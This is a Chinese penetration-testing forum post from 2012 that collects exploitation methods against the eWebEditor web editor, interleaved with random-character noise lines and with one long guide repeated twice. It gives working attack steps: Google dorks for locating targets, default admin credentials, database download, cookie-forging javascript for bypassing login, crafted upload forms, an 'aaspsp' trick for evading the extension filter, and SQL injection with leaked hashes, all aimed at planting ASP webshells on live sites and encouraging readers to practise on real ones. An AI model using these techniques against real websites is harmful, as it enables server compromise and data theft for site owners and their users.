中国网络渗透测试联盟
标题:
Ewebeditor漏洞2
[打印本页]
作者:
admin
时间:
2012-9-13 17:00
标题:
Ewebeditor漏洞2
eWebEditor.asp?id=45&style=standard1 样式调用
9 u6 \* B2 p3 x4 h
" g2 V6 F# s6 z. i. n! o2 w
* w; I5 u3 ?/ a1 Q% d& e
/edit/admin_uploadfile.asp?id=14&dir=../../..
6 l8 N- j. v- g4 v/ u( W
可以浏览网站目录 ../自己加或者减
5 L4 [" V& }! u
7 }: z5 \( v; J( h8 L
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
- ?, i9 z$ a' m' A
简单利用就是
/ L" W. {7 z% H7 g+ J
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
3 @9 p; j b+ @
http://www.siqinci.com/ewebedito
... amp;style=full_v200
' ]( r4 a+ A# _ C# U4 h, s" g
可以利用nbsi进行猜解,对此进行注入
# ]) b2 ^8 T" O! J0 k. T! e2 J) K
还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
6 _/ x# [$ z* M! z
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:
, L9 N( I% f! j( N$ d4 y
在action下面
5 z" k+ q" l0 _# A
<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">
! \2 n. ]. H1 H$ D
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
' P- |) }* f4 i- l
<input type="submit" name="uploadfile" value="提交">
3 X+ P( H/ \0 N6 u% G3 g
<input type=hidden name=originalfile value="">
1 N0 {: }5 N: x) s
</form>
% g- u0 w' f! s1 y; n" l+ c
------------------------------------------------------------------------------------------------------------------------------------------------
4 y. L: u9 ^- a/ w
<input type="submit" name="uploadfile" value="提交"> 放在action后头
- m m% D0 M! Z1 z
,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
) I' { z& `5 ?, W/ O$ c. d
) T- q1 t/ S, M/ _+ d
6 ?7 I* ?4 \4 ]4 B' b8 i$ U9 _
" N9 m# b# w+ b
$ q1 q, k7 M: O/ j% y% ]
Ewebeditor最新漏洞及漏洞大全[收集] (图)
. T- P' Z# K0 ^% T% F
本帖最后由 administrator 于 2009-7-7 21:24 编辑
1 ?4 [8 N+ e/ E/ u
* f* @6 @6 t( d8 \
以下文章收集转载于网络
1 l* @ \' o) ~$ r
#主题描述# ewebeditor 3.8漏洞[php]
/ H7 Z" K. D- |/ m
--------------------------------------------------------------------------------------------
# t. j* c |/ r9 A7 N* d! [% A
#内容#
8 G5 e3 @& r1 z7 C
php版ewebeditor 3.8的漏洞
# W) f$ f- g% A5 i- Q
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
; w: H& U4 x9 F$ ~# I t' n$ v
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
/ ]; K; W: Q s+ U/ y& z/ J0 z
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
8 H0 E `, q1 T/ i9 {& K
3 后面的利用和asp一样,新增样式修改上传,就ok了
$ ], M3 b6 g7 K
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
" q7 i) t0 [: U( B+ Z/ z$ `' ~
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
/ C* Z/ K$ C& y. h& C; S0 J
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
2 o1 t7 X3 Y& s& a* `
--------------------------------------------------------------------------------------------
/ r. v- n+ a# w& N7 B0 C2 a \
5 }. \ p( Y& O8 J( d: ~
4 \, ?+ K% o( [& h& |; U1 s
算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
5 J5 z/ |% L9 ^- l7 l
4 Y% A5 K* I4 B1 E6 H6 m
漏洞更新日期TM: 2009 2 9日 转自zake’S Blog
+ n! C* c- V% ~
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
9 a' w1 P% o4 D, _
那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址
1 X( v# V4 p' U
* A* S+ N8 n. u5 g1 ?7 o1 l I
# d$ w& @0 `* V5 I9 V
然后确定以后,这里是最关键的一部!
+ Q) S; J4 E' R" y, U8 k
这里点了远程上传以后,再提交得到木马地址
5 D6 ^9 W0 u4 k L5 T# g
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限
" r4 P* a5 I- o$ H$ v
属于安全检测漏洞版本ewebeditor v6.0.0
5 J. Q; C3 O ]3 |" j
' o) N) h: e* F
以前的ewebeditor漏洞:
& q% |. J$ S! n, _ _; y
# n# a$ a' B; H
ewebeditor注入漏洞
$ M; H9 _8 Y) Q; o
?7 B$ r$ B4 j
大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb
' C0 a+ H4 p" k
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
: j/ H3 J# |* ? E! f3 C0 `
今天我给大家带来的也是ewebeditor编辑器的入侵方法
2 v" }2 Y- ?+ M: D5 M) r
不过一种是注入,一种是利用upload.asp文件,本地构造
- M9 P$ C8 H4 o3 P; d
NO1:注入
" C/ X6 d; O* F& G; k) h4 g! g
http://www.XXX.com/ewebeditor200
... amp;style=full_v200
4 |6 S0 n9 }, \, t1 K
编辑器ewebedior7以前版本通通存在注入
3 v: y. p9 u; D! y- {4 O; H
直接检测不行的,要写入特征字符
9 u% t1 Y, l* ` ?5 `0 E$ _$ P
我们的工具是不知道ewebeditor的表名的还有列名
; B- l) A- _1 f- L, r
我们自己去看看
) p8 v; U2 o& c( G/ W. [
哎。。先表吧
- t" }" D' U7 c2 Z0 w9 ^& j7 l
要先添加进库
- D9 f2 m$ A8 ~/ p3 M* X
开始猜账号密码了
! E; H) A" M/ t" F& T& ]
我们==
5 x. f' Q; P9 |8 ]3 H& ~2 c% B
心急的往后拉
( ?$ x/ s n! _, J9 ?, X
出来了
8 ?$ b) V; Z# ]
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120
. G/ n G) p; P5 j/ R& o9 r t
对吧^_^
- _& q; G1 y g9 k5 K/ g
后面不说了
! ^3 I5 T& H8 v; q1 x4 v9 P
NO2:利用upload.asp文件,本地构造上传shell
& z3 z- ^+ E. a. ]
大家看这里
4 p2 D& N; v/ x: y
http://www.siqinci.com/ewebedito
... lepreview&id=37
" G4 {1 t- M' M. I2 g
如果遇见这样的情况又无法添加工具栏是不是很郁闷
. ^% s' x: o5 L5 n7 x3 z
现在不郁闷了,^_^源源不一般
1 @! H& y% H1 x5 D+ Z' O+ s! m1 t
我们记录下他的样式名“aaa”
7 g0 s) n9 G( H% V/ [0 R
我已经吧upload.asp文件拿出来了
: M' l. |- Q9 \; r" s' [+ A
我们构造下
8 ^/ ]8 ^( U) v$ t# ^
OK,我之前已经构造好了
+ C6 c3 |+ Y& d5 M8 [4 {8 Y
其实就是这里
% I2 h O3 b, q) m3 {! ^
<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>
( l& ?0 M5 ^! g: {+ a$ J; [5 X
<input type=file name=uploadfile size=1 style=”width:100%”>
6 M p' q4 S6 c. H8 v. M5 @! d
<input type=submit value=”上传了”></input>
' ]7 h' N+ {! z
</form>
( E% u- M: |6 T1 H- _3 O
下面我们运行他上传个大马算了
9 |- ?) H* a1 s
UploadFile上传进去的在这个目录下
* {& ]7 V! ?8 ^) b$ h) H4 y
2008102018020762.asa
7 G a7 ?- T- p" G; g1 x" o: m( ]
" J) e/ u" D1 r. t8 T
过往漏洞:
4 i2 Y: a0 K1 s1 D; U' K$ ?: m
% z4 J0 E/ T, C8 B, y4 F
首先介绍编辑器的一些默认特征:
- @- Y& m3 J' ?; U1 P1 d
默认登陆admin_login.asp
6 \. t/ k- ?- B4 M B0 f
默认数据库db/ewebeditor.mdb
# i+ b+ e0 D) p' V. o" P; s
默认帐号admin 密码admin或admin888
0 w* U+ f3 z) z W+ R) q8 E4 F
搜索关键字:”inurl:ewebeditor” 关键字十分重要
/ h y8 Y2 S& z' |
有人搜索”eWebEditor - eWebSoft在线编辑器”
" c0 s- }; @' v9 X3 s+ X( u
根本搜索不到几个~
3 `0 D0 T$ a, F+ v
baidu.google搜索inurl:ewebeditor
6 W. }( I" R3 Z$ Z0 X% K5 d4 T9 w
几万的站起码有几千个是具有默认特征的~
1 t* |3 H- j/ L! |5 d. }) z8 W% B
那么试一下默认后台
5 M: o1 N6 y5 ]% C2 t
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp
. b7 u* i: h; n) b* n
试默认帐号密码登陆。
' N6 o* d; |" F
利用eWebEditor获得WebShell的步骤大致如下:
' _) ^& R% p" p% D& I+ h9 T
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
& x' W) L* y6 M3 s1 j8 n
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
: B5 Y! _" A. O% w5 }
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
3 n+ J& c/ H3 Q$ ]+ V4 t+ b
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
' l1 U9 X0 o8 m6 ^# F6 v
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
; O& v5 F( ^1 X) O
然后在上传的文件类型中增加“asa”类型。
6 t; H9 Q8 S, k' A" P& C$ r n
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
& y6 d9 A: c+ \) b* `
漏洞原理
1 p5 r4 `8 N$ X _8 ~
漏洞的利用原理很简单,请看Upload.asp文件:
A z* L; B: {. x. ]
任何情况下都不允许上传asp脚本文件
: G. w. r) {: N+ c: `! J! Q
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
2 M( N, C& q9 H; t8 R
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
) Z. h. @. w$ F) P8 V' K+ `' C
高级应用
/ c2 a. _9 K) U' s; X
eWebEditor的漏洞利用还有一些技巧:
; H0 O! M) f% ?: h9 Y
1.使用默认用户名和密码无法登录。
& ^" Z0 s* |/ U0 b$ h
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
6 z2 S) w. u% M. D
2.加了asa类型后发现还是无法上传。
i4 ` U R3 u v
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:
! e0 {$ A$ h' X2 f& H% g: \, ~
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
6 t% u# ~, z' f0 r6 S; a
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
$ S/ a$ A) s: K6 r3 M( q- a
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
! | [2 @. S0 ? S; q
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
8 ], J: {6 t8 o5 V3 o) ?# F
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
+ `. o' b# Z, l4 a+ B! l2 p5 a, s2 p
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
( l1 c+ p- G7 G7 g7 w
后记
$ ]! `) i% a$ D) N. u H8 V4 B4 b
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
2 G# y0 x6 N, c b( C( H
基本入侵基础漏洞
0 N5 V8 P7 \" j! T6 ?1 l
eWebEditor 漏洞
7 P. w# W0 A4 {5 g* ^: ^
" O" [* Y8 Z0 V, D7 Z
各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!
5 a5 H7 O0 b6 ~/ o+ n
& q8 B# B0 k9 ]& X5 b
漏洞利用
9 i5 b4 j- z/ k1 C9 O( N) T4 F& H
利用eWebEditor获得WebShell的步骤大致如下:
" L! w! b, e4 a7 V( Q% n
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
6 t+ B, G: @2 R& e
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。
/ D$ P% Y2 ]" U o
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
( i' S) Y; `9 q7 V. T, o+ }
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
4 ]/ `2 C& U! e+ D9 a
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
0 T4 V# S$ g0 z
/ E' }, k; T5 X% ^
然后在上传的文件类型中增加“asa”类型。
. T1 S* }) G9 @$ g [
' Z5 S& k. N. Y! g4 @8 c- I
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
% I1 @% q$ h3 z& A5 {( o
! u* Z: R2 j- }) x! Z \1 M
) E1 C- @6 C1 m3 a* F
漏洞原理
4 A% P# c2 d. ]; b4 ^+ P
漏洞的利用原理很简单,请看Upload.asp文件:
! }# J& q% G6 {4 |. \7 @. r' R
任何情况下都不允许上传asp脚本文件
8 N' L* l( v. X" N
sAllowExt = replace(UCase(sAllowExt), "ASP", "")
2 W. x8 d3 v# F- Y# c1 F* U
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
# s" V0 p. s% X5 ?
% u) P) D5 \9 V) K2 C. G
高级应用
+ c/ c, V) I# z' L% o( y
eWebEditor的漏洞利用还有一些技巧:
) n0 N' g& X4 o- a; }/ U# G
1.使用默认用户名和密码无法登录。
* K( x/ S8 a' ]4 t
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。
; p! w) e: L8 e( X; h& {" Y* e
2.加了asa类型后发现还是无法上传。
! E" X0 x0 r. S5 j; ^" G0 A; Z
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
U% [+ i, |/ P' G- [
sAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
: J8 T6 ^2 @% `! m; ~$ ]9 `1 L
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
F4 U) |1 O5 M; z q- x6 r
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
2 \4 c, ^$ j1 H; Q' |% K
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
% v- ^9 P3 g- f3 ^' V2 b
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
3 _9 s+ B& ]* P8 \
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
+ N" C. {0 x# O& Y9 ]- X; y9 A+ Y9 n
' ]$ i, d- y" O$ V1 t/ s
后记
( j' l" J& w- p' d2 I
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2